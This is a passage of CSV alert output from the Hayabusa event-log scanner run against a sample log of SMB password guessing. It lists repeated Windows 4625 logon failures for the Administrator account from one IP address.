NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.568 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.004 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.452 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.894 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.360 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.868 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.316 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: 
